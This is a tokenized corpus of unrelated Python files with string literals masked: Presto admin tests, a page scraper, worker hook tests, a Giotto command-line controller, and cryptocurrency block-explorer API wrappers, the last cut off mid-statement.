) <EOL> next_uri = self . get_key_value ( output , '<STR_LIT>' ) <EOL> if not data : <EOL> raise PrestoError ( '<STR_LIT>' <EOL> '<STR_LIT>' % output ) <EOL> return data <EOL> def get_key_value ( self , text , key ) : <EOL> try : <EOL> return json . loads ( text ) [ key ] <EOL> except KeyError : <EOL> return '<STR_LIT>' <EOL> except ValueError as e : <EOL> raise ValueError ( e . message + '<STR_LIT:\n>' + text ) <EOL> def _assert_connectors_loaded ( self , expected_connectors ) : <EOL> self . retry ( lambda : self . assertEqual ( expected_connectors , <EOL> self . get_connector_info ( ) ) ) </s>
<s> """<STR_LIT>""" <EOL> from fabric . api import env <EOL> from mock import patch <EOL> from prestoadmin import coordinator <EOL> from prestoadmin . util . exception import ConfigurationError <EOL> from tests . base_test_case import BaseTestCase <EOL> class TestCoordinator ( BaseTestCase ) : <EOL> def test_build_all_defaults ( self ) : <EOL> env . roledefs [ '<STR_LIT>' ] = '<STR_LIT:a>' <EOL> env . roledefs [ '<STR_LIT>' ] = [ '<STR_LIT:b>' , '<STR_LIT:c>' ] <EOL> actual_default = coordinator . Coordinator ( ) . build_all_defaults ( ) <EOL> expected = { '<STR_LIT>' : <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:true>' , <EOL> '<STR_LIT>' : '<STR_LIT:true>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:false>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> self . assertEqual ( actual_default , expected ) <EOL> def test_defaults_coord_is_worker ( self ) : <EOL> env . roledefs [ '<STR_LIT>' ] = [ '<STR_LIT:a>' ] <EOL> env . roledefs [ '<STR_LIT>' ] = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] <EOL> actual_default = coordinator . Coordinator ( ) . 
build_all_defaults ( ) <EOL> expected = { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:true>' , <EOL> '<STR_LIT>' : '<STR_LIT:true>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:true>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> self . assertEqual ( actual_default , expected ) <EOL> def test_validate_valid ( self ) : <EOL> conf = { '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:true>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } } <EOL> self . assertEqual ( conf , coordinator . Coordinator . validate ( conf ) ) <EOL> def test_validate_default ( self ) : <EOL> env . roledefs [ '<STR_LIT>' ] = '<STR_LIT:localhost>' <EOL> env . roledefs [ '<STR_LIT>' ] = [ '<STR_LIT:localhost>' ] <EOL> conf = coordinator . Coordinator ( ) . build_all_defaults ( ) <EOL> self . assertEqual ( conf , coordinator . Coordinator . validate ( conf ) ) <EOL> def test_invalid_conf ( self ) : <EOL> conf = { '<STR_LIT>' : { } } <EOL> self . assertRaisesRegexp ( ConfigurationError , <EOL> '<STR_LIT>' , <EOL> coordinator . Coordinator . validate , conf ) <EOL> def test_invalid_conf_missing_coordinator ( self ) : <EOL> conf = { '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> self . assertRaisesRegexp ( ConfigurationError , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> coordinator . Coordinator . 
validate , conf ) <EOL> def test_invalid_conf_coordinator ( self ) : <EOL> conf = { '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:false>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> self . assertRaisesRegexp ( ConfigurationError , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> coordinator . Coordinator . validate , conf ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get_conf_empty_is_default ( self , get_conf_from_file_mock , <EOL> write_mock ) : <EOL> env . roledefs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> env . roledefs [ '<STR_LIT>' ] = [ '<STR_LIT>' , '<STR_LIT:L>' ] <EOL> get_conf_from_file_mock . return_value = { } <EOL> self . assertEqual ( coordinator . Coordinator ( ) . get_conf ( ) , <EOL> coordinator . Coordinator ( ) . build_all_defaults ( ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get_conf ( self , get_conf_from_file_mock , write_mock ) : <EOL> env . roledefs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> env . roledefs [ '<STR_LIT>' ] = [ '<STR_LIT>' , '<STR_LIT:L>' ] <EOL> file_conf = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:value>' , <EOL> '<STR_LIT>' : '<STR_LIT:test>' } } <EOL> get_conf_from_file_mock . return_value = file_conf <EOL> expected = { '<STR_LIT>' : <EOL> { '<STR_LIT>' : '<STR_LIT:value>' , <EOL> '<STR_LIT>' : '<STR_LIT:test>' } , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:true>' , <EOL> '<STR_LIT>' : '<STR_LIT:true>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:false>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> self . assertEqual ( coordinator . Coordinator ( ) . get_conf ( ) , expected ) </s>
<s> import requests <EOL> import json <EOL> from lxml import html <EOL> api_key = '<STR_LIT>' <EOL> url_template = '<STR_LIT>' <EOL> session_cookie = '<STR_LIT>' <EOL> input_fetch = { <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:data>' : { <EOL> '<STR_LIT:url>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : session_cookie , <EOL> } , <EOL> } , <EOL> } <EOL> print '<STR_LIT>' <EOL> travel_benefits_link = '<STR_LIT>' <EOL> input_fetch [ '<STR_LIT:data>' ] [ '<STR_LIT:url>' ] = travel_benefits_link <EOL> headers = { <EOL> '<STR_LIT>' : api_key , <EOL> } <EOL> r = requests . post ( url_template % '<STR_LIT>' , headers = headers , data = json . dumps ( input_fetch ) ) <EOL> output_full = r . json ( ) <EOL> html_content = output_full [ '<STR_LIT:data>' ] [ '<STR_LIT:content>' ] <EOL> tree = html . fromstring ( html_content . encode ( '<STR_LIT:utf-8>' ) ) <EOL> tree . make_links_absolute ( travel_benefits_link ) <EOL> print '<STR_LIT>' <EOL> benefit_links = tree . xpath ( '<STR_LIT>' ) <EOL> benefits = { } <EOL> for link in benefit_links [ : <NUM_LIT:3> ] : <EOL> benefit_name = link . text . strip ( ) <EOL> print '<STR_LIT>' % benefit_name <EOL> input_fetch [ '<STR_LIT:data>' ] [ '<STR_LIT:url>' ] = link . get ( '<STR_LIT>' ) <EOL> r = requests . post ( url_template % '<STR_LIT>' , headers = headers , data = json . dumps ( input_fetch ) ) <EOL> output_full = r . json ( ) <EOL> html_content = output_full [ '<STR_LIT:data>' ] [ '<STR_LIT:content>' ] <EOL> tree = html . fromstring ( html_content . encode ( '<STR_LIT:utf-8>' ) ) <EOL> tree . make_links_absolute ( travel_benefits_link ) <EOL> benefits [ benefit_name ] = tree . xpath ( '<STR_LIT>' ) [ <NUM_LIT:0> ] . text_content ( ) <EOL> print '<STR_LIT>' <EOL> with open ( '<STR_LIT>' , '<STR_LIT:w>' ) as f : <EOL> f . write ( json . dumps ( benefits ) ) </s>
<s> SIMULATE_ZOMBIE_JOBS = True </s>
<s> import json <EOL> def test_io_hooks_nothing ( worker ) : <EOL> worker . start ( flags = "<STR_LIT>" ) <EOL> assert worker . send_task ( <EOL> "<STR_LIT>" , { "<STR_LIT:a>" : <NUM_LIT> , "<STR_LIT:b>" : <NUM_LIT:1> } ) == <NUM_LIT> <EOL> events = json . loads ( <EOL> worker . send_task ( "<STR_LIT>" , { } ) ) <EOL> job_events = [ x for x in events if x . get ( "<STR_LIT>" ) ] <EOL> for evt in job_events : <EOL> print evt <EOL> assert len ( job_events ) == <NUM_LIT:1> * <NUM_LIT:2> <EOL> assert job_events [ <NUM_LIT:0> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:1> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:0> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:1> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:0> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:1> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> def test_io_hooks_redis ( worker ) : <EOL> worker . start ( flags = "<STR_LIT>" ) <EOL> worker . send_task ( <EOL> "<STR_LIT>" , <EOL> { "<STR_LIT:test>" : "<STR_LIT>" , "<STR_LIT>" : { "<STR_LIT:key>" : "<STR_LIT>" } } <EOL> ) <EOL> events = json . loads ( <EOL> worker . send_task ( "<STR_LIT>" , { } ) ) <EOL> job_events = [ x for x in events if x . 
get ( "<STR_LIT>" ) ] <EOL> for evt in job_events : <EOL> print evt <EOL> assert len ( job_events ) == <NUM_LIT:2> * <NUM_LIT:2> <EOL> assert job_events [ <NUM_LIT:0> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:1> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:0> ] [ "<STR_LIT:key>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:1> ] [ "<STR_LIT:key>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:0> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:1> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:2> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:3> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:2> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:3> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:2> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:3> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> def test_io_hooks_mongodb ( worker ) : <EOL> worker . start ( flags = "<STR_LIT>" ) <EOL> worker . send_task ( <EOL> "<STR_LIT>" , <EOL> { "<STR_LIT:test>" : "<STR_LIT>" } <EOL> ) <EOL> events = json . loads ( <EOL> worker . send_task ( "<STR_LIT>" , { } ) ) <EOL> job_events = [ x for x in events if x . 
get ( "<STR_LIT>" ) ] <EOL> for evt in job_events : <EOL> print evt <EOL> assert len ( job_events ) == <NUM_LIT:4> * <NUM_LIT:2> <EOL> assert job_events [ <NUM_LIT:0> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:1> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:0> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:1> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:0> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:1> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:2> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:3> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:2> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:3> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:2> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:3> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:4> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:5> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:4> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:5> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:4> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:5> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:6> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:7> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:6> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:7> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:6> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:7> ] [ "<STR_LIT>" ] == "<STR_LIT>" </s>
<s> import os <EOL> from giotto . utils import parse_kwargs <EOL> from giotto . controllers import GiottoController <EOL> from giotto . control import Redirection <EOL> cmd_execution_snippet = """<STR_LIT>""" <EOL> def make_cmd_invocation ( invocation , args , kwargs ) : <EOL> """<STR_LIT>""" <EOL> if not invocation . endswith ( '<STR_LIT:/>' ) : <EOL> invocation += '<STR_LIT:/>' <EOL> if not invocation . startswith ( '<STR_LIT:/>' ) : <EOL> invocation = '<STR_LIT:/>' + invocation <EOL> cmd = invocation <EOL> for arg in args : <EOL> cmd += str ( arg ) + "<STR_LIT:/>" <EOL> rendered_kwargs = [ ] <EOL> for k , v in kwargs . items ( ) : <EOL> rendered_kwargs . append ( "<STR_LIT>" % ( k , v ) ) <EOL> return [ '<STR_LIT>' , cmd ] + rendered_kwargs <EOL> class CMDRequest ( object ) : <EOL> def __init__ ( self , argv ) : <EOL> self . enviornment = os . environ <EOL> self . argv = argv <EOL> class CMDController ( GiottoController ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> default_mimetype = '<STR_LIT>' <EOL> def get_invocation ( self ) : <EOL> return self . request . argv [ <NUM_LIT:1> ] <EOL> def get_controller_name ( self ) : <EOL> return '<STR_LIT>' <EOL> def get_raw_data ( self ) : <EOL> """<STR_LIT>""" <EOL> arguments = self . request . argv [ <NUM_LIT:1> : ] <EOL> if not arguments [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) : <EOL> arguments = arguments [ <NUM_LIT:1> : ] <EOL> return parse_kwargs ( arguments ) <EOL> def get_concrete_response ( self ) : <EOL> result = self . get_data_response ( ) <EOL> if type ( result ) == Redirection : <EOL> invocation , args , kwargs = result . rendered_invocation <EOL> rendered_invocation = make_cmd_invocation ( invocation , args , kwargs ) <EOL> req = CMDRequest ( rendered_invocation ) <EOL> return CMDController ( req , self . manifest , self . 
model_mock ) <EOL> else : <EOL> response = { <EOL> '<STR_LIT>' : [ result [ '<STR_LIT:body>' ] ] , <EOL> '<STR_LIT>' : [ ] , <EOL> } <EOL> stdout = response [ '<STR_LIT>' ] <EOL> if hasattr ( stdout , '<STR_LIT>' ) : <EOL> print ( stdout . write ( ) ) <EOL> else : <EOL> for line in stdout : <EOL> print ( line ) <EOL> for line in response [ '<STR_LIT>' ] : <EOL> sys . stderr . write ( line ) <EOL> def persist ( self , persist , response ) : <EOL> print ( "<STR_LIT>" ) <EOL> for key , value in persist . iteritems ( ) : <EOL> print ( "<STR_LIT>" % ( key . upper ( ) , value ) ) <EOL> def get_primitive ( self , name ) : <EOL> if name == '<STR_LIT>' : <EOL> return self . get_raw_data ( ) <EOL> elif name == '<STR_LIT>' : <EOL> return getattr ( self . request , '<STR_LIT:user>' , None ) </s>
<s> import json <EOL> from . core import Service , NoService , NoData , SkipThisService , currency_to_protocol <EOL> import arrow <EOL> class Bitstamp ( Service ) : <EOL> service_id = <NUM_LIT:1> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> api_homepage = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_current_price ( self , crypto , fiat ) : <EOL> if fiat . lower ( ) != '<STR_LIT>' : <EOL> raise SkipThisService ( '<STR_LIT>' ) <EOL> url = "<STR_LIT>" <EOL> response = self . get_url ( url ) . json ( ) <EOL> return float ( response [ '<STR_LIT>' ] ) <EOL> class BlockCypher ( Service ) : <EOL> service_id = <NUM_LIT:2> <EOL> supported_cryptos = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> api_homepage = "<STR_LIT>" <EOL> explorer_address_url = "<STR_LIT>" <EOL> explorer_tx_url = "<STR_LIT>" <EOL> explorer_blockhash_url = "<STR_LIT>" <EOL> explorer_blocknum_url = "<STR_LIT>" <EOL> base_api_url = "<STR_LIT>" <EOL> json_address_balance_url = base_api_url + "<STR_LIT>" <EOL> json_txs_url = json_address_balance_url <EOL> json_unspent_outputs_url = base_api_url + "<STR_LIT>" <EOL> json_blockhash_url = base_api_url + "<STR_LIT>" <EOL> json_blocknum_url = base_api_url + "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = self . json_address_balance_url . format ( address = address , crypto = crypto ) <EOL> response = self . get_url ( url ) <EOL> if confirmations == <NUM_LIT:0> : <EOL> return response . json ( ) [ '<STR_LIT>' ] / <NUM_LIT> <EOL> elif confirmations == <NUM_LIT:1> : <EOL> return response . json ( ) [ '<STR_LIT>' ] / <NUM_LIT> <EOL> else : <EOL> raise SkipThisService ( "<STR_LIT>" ) <EOL> def get_unspent_outputs ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = self . json_unspent_outputs_url . format ( address = address , crypto = crypto ) <EOL> utxos = [ ] <EOL> for utxo in self . get_url ( url ) . 
json ( ) [ '<STR_LIT>' ] : <EOL> if utxo [ '<STR_LIT>' ] < confirmations : <EOL> continue <EOL> utxos . append ( dict ( <EOL> amount = utxo [ '<STR_LIT:value>' ] , <EOL> output = "<STR_LIT>" % ( utxo [ '<STR_LIT>' ] , utxo [ '<STR_LIT>' ] ) , <EOL> address = address , <EOL> confirmations = utxo [ '<STR_LIT>' ] , <EOL> ) ) <EOL> return utxos <EOL> def get_transactions ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = self . json_txs_url . format ( address = address , crypto = crypto ) <EOL> transactions = [ ] <EOL> for tx in self . get_url ( url ) . json ( ) [ '<STR_LIT>' ] : <EOL> if utxo [ '<STR_LIT>' ] < confirmations : <EOL> continue <EOL> transactions . append ( dict ( <EOL> date = arrow . get ( tx [ '<STR_LIT>' ] ) . datetime , <EOL> amount = tx [ '<STR_LIT:value>' ] / <NUM_LIT> , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> confirmations = utxo [ '<STR_LIT>' ] <EOL> ) ) <EOL> return transactions <EOL> def get_optimal_fee ( self , crypto , tx_bytes ) : <EOL> url = "<STR_LIT>" % crypto <EOL> fee_kb = self . get_url ( url ) . json ( ) [ '<STR_LIT>' ] <EOL> return int ( tx_bytes * fee_kb / <NUM_LIT> ) <EOL> def get_block ( self , crypto , block_hash = '<STR_LIT>' , block_number = '<STR_LIT>' , latest = False ) : <EOL> if block_hash : <EOL> url = self . json_blockhash_url . format ( blockhash = block_hash , crypto = crypto ) <EOL> elif block_number : <EOL> url = self . json_blocknum_url . format ( blocknum = block_number , crypto = crypto ) <EOL> r = self . get_url ( url ) . json ( ) <EOL> return dict ( <EOL> block_number = r [ '<STR_LIT>' ] , <EOL> confirmations = r [ '<STR_LIT>' ] + <NUM_LIT:1> , <EOL> time = arrow . get ( r [ '<STR_LIT>' ] ) . 
datetime , <EOL> sent_value = r [ '<STR_LIT>' ] / <NUM_LIT> , <EOL> total_fees = r [ '<STR_LIT>' ] / <NUM_LIT> , <EOL> hash = r [ '<STR_LIT>' ] , <EOL> merkle_root = r [ '<STR_LIT>' ] , <EOL> previous_hash = r [ '<STR_LIT>' ] , <EOL> tx_count = r [ '<STR_LIT>' ] , <EOL> txids = r [ '<STR_LIT>' ] <EOL> ) <EOL> class BlockSeer ( Service ) : <EOL> """<STR_LIT>""" <EOL> service_id = <NUM_LIT:3> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> api_homepage = "<STR_LIT>" <EOL> explorer_address_url = "<STR_LIT>" <EOL> explorer_tx_url = "<STR_LIT>" <EOL> explorer_blocknum_url = "<STR_LIT>" <EOL> explorer_blockhash_url = "<STR_LIT>" <EOL> json_address_balance_url = "<STR_LIT>" <EOL> json_txs_url = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = self . json_address_balance_url . format ( address = address ) <EOL> return self . get_url ( url ) . json ( ) [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] / <NUM_LIT> <EOL> def get_transactions ( self , crypo , address ) : <EOL> url = self . json_txs_url . format ( address = address ) <EOL> transactions = [ ] <EOL> for tx in self . get_url ( url ) . json ( ) [ '<STR_LIT:data>' ] [ '<STR_LIT:address>' ] [ '<STR_LIT>' ] : <EOL> transactions . append ( dict ( <EOL> date = arrow . get ( tx [ '<STR_LIT:time>' ] ) . datetime , <EOL> amount = tx [ '<STR_LIT>' ] / <NUM_LIT> , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> ) ) <EOL> return transactions <EOL> class SmartBitAU ( Service ) : <EOL> service_id = <NUM_LIT:4> <EOL> api_homepage = "<STR_LIT>" <EOL> base_url = "<STR_LIT>" <EOL> explorer_address_url = "<STR_LIT>" <EOL> explorer_tx_url = "<STR_LIT>" <EOL> explorer_blocknum_url = "<STR_LIT>" <EOL> explorer_blockhash_url = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . base_url , address ) <EOL> r = self . get_url ( url ) . 
json ( ) <EOL> confirmed = float ( r [ '<STR_LIT:address>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> if confirmations > <NUM_LIT:1> : <EOL> return confirmed <EOL> else : <EOL> return confirmed + float ( r [ '<STR_LIT:address>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> def get_balance_multi ( self , crypto , addresses , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . base_url , "<STR_LIT:U+002C>" . join ( addresses ) ) <EOL> response = self . get_url ( url ) . json ( ) <EOL> ret = { } <EOL> for data in response [ '<STR_LIT>' ] : <EOL> bal = float ( data [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> if confirmations == <NUM_LIT:0> : <EOL> bal += float ( data [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> ret [ data [ '<STR_LIT:address>' ] ] = bal <EOL> return ret <EOL> def get_transactions ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . base_url , address ) <EOL> transactions = [ ] <EOL> for tx in self . get_url ( url ) . json ( ) [ '<STR_LIT:address>' ] [ '<STR_LIT>' ] : <EOL> out_amount = sum ( float ( x [ '<STR_LIT:value>' ] ) for x in tx [ '<STR_LIT>' ] if address in x [ '<STR_LIT>' ] ) <EOL> in_amount = sum ( float ( x [ '<STR_LIT:value>' ] ) for x in tx [ '<STR_LIT>' ] if address in x [ '<STR_LIT>' ] ) <EOL> transactions . append ( dict ( <EOL> amount = out_amount - in_amount , <EOL> date = arrow . get ( tx [ '<STR_LIT:time>' ] ) . datetime , <EOL> fee = float ( tx [ '<STR_LIT>' ] ) , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> confirmations = tx [ '<STR_LIT>' ] , <EOL> ) ) <EOL> return transactions <EOL> def get_unspent_outputs ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . base_url , address ) <EOL> utxos = [ ] <EOL> for utxo in self . get_url ( url ) . json ( ) [ '<STR_LIT>' ] : <EOL> utxos . 
append ( dict ( <EOL> amount = utxo [ '<STR_LIT>' ] , <EOL> output = "<STR_LIT>" % ( utxo [ '<STR_LIT>' ] , utxo [ '<STR_LIT:n>' ] ) , <EOL> address = address , <EOL> confirmations = utxo [ '<STR_LIT>' ] , <EOL> scriptpubkey_hex = utxo [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> scriptpubkey_asm = utxo [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> ) ) <EOL> return utxos <EOL> def push_tx ( self , crypto , tx_hex ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" % self . base_url <EOL> return self . post_url ( url , { '<STR_LIT>' : tx_hex } ) . content <EOL> def get_mempool ( self ) : <EOL> url = "<STR_LIT>" % self . base_url <EOL> txs = [ ] <EOL> for tx in self . get_url ( url ) . json ( ) [ '<STR_LIT>' ] : <EOL> txs . append ( dict ( <EOL> first_seen = arrow . get ( tx [ '<STR_LIT>' ] ) . datetime , <EOL> size = tx [ '<STR_LIT:size>' ] , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> fee = float ( tx [ '<STR_LIT>' ] ) , <EOL> ) ) <EOL> return txs <EOL> class Blockr ( Service ) : <EOL> service_id = <NUM_LIT:5> <EOL> supported_cryptos = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> api_homepage = "<STR_LIT>" <EOL> explorer_address_url = "<STR_LIT>" <EOL> explorer_tx_url = "<STR_LIT>" <EOL> explorer_blockhash_url = "<STR_LIT>" <EOL> explorer_blocknum_url = "<STR_LIT>" <EOL> explorer_latest_block = "<STR_LIT>" <EOL> json_address_url = "<STR_LIT>" <EOL> json_single_tx_url = "<STR_LIT>" <EOL> json_txs_url = url = "<STR_LIT>" <EOL> json_unspent_outputs_url = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = self . json_address_url . format ( address = address , crypto = crypto ) <EOL> response = self . get_url ( url ) <EOL> return response . json ( ) [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] <EOL> def get_balance_multi ( self , crypto , addresses , confirmations = <NUM_LIT:1> ) : <EOL> url = self . json_address_url . format ( address = '<STR_LIT:U+002C>' . 
